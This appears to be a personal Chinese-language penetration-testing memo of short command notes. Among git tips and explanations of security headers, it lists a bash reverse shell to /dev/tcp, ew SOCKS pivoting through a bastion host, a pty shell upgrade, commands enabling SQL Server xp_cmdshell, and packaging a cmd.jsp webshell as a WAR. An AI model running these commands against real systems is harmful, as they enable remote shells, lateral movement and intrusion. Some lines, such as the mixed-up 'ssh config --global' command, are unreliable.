一个抽象人的小站

# 备忘录

代码审计

代码执行函数:eval assert call_user_func() call_user_func_array() array_map() $_GET['A']($_POST['b']) preg_replace

SCP传输文件
密码登录
scp -r 本地文件 root@x.x.x.x:/home/xxx .

wget指定目录下载:
wget xxxx -P 指定目录

内网命令
python -c 'import pty;pty.spawn("/bin/bash")'; //伪交互

ew转发命令记录:
ew -s rcsocks -l 1080 -e 8888 堡垒机
ew -s rssocks -d 1.1.1.1 -e 8888 靶机链接
本地自己用socks5代理工具 我用ubuntu proxychains win有proxfix

反弹shell:
bash -i >& /dev/tcp/ip/port 0>&1

sqlserver
表:

information_schema
sysobjects
syscolumns
sys.objects
sys.columns

DBA开xp_cmdshell

execute('sp_configure ''advanced_options'',1;')
execute('RECONFIGURE')
execute('sp_configure ''xp_cmdshell'',1;')
execute('RECONFIGURE')

git

ssh-keygen -t RSA "邮箱" //这里邮箱要跟github或gitlib那边一样
ssh config --global user.email "邮箱"
//gitlab要创建一个access token
git add * 添加文件
git commit -m "信息"
git push origin master //上传到master分支

X-Frame-Options响应头

X-Frame-Options 响应头有三个可选的值:
DENY:页面不能被嵌入到任何iframe或frame中;
SAMEORIGIN:页面只能被本站页面嵌入到iframe或者frame中;
ALLOW-FROM:页面允许frame或frame加载。

X-XSS-Protection
0: 表示关闭浏览器的XSS防护机制
1; mode=block:如果检测到恶意代码,在不渲染恶意代码
1:删除检测到的恶意代码, 如果响应报文中没有看到X-XSS-Protection 字段,那么浏览器就认为X-XSS-Protection配置为1,这是浏览器的默认设置

WAR包封装

java 目录

jar cvf level.war cmd.jsp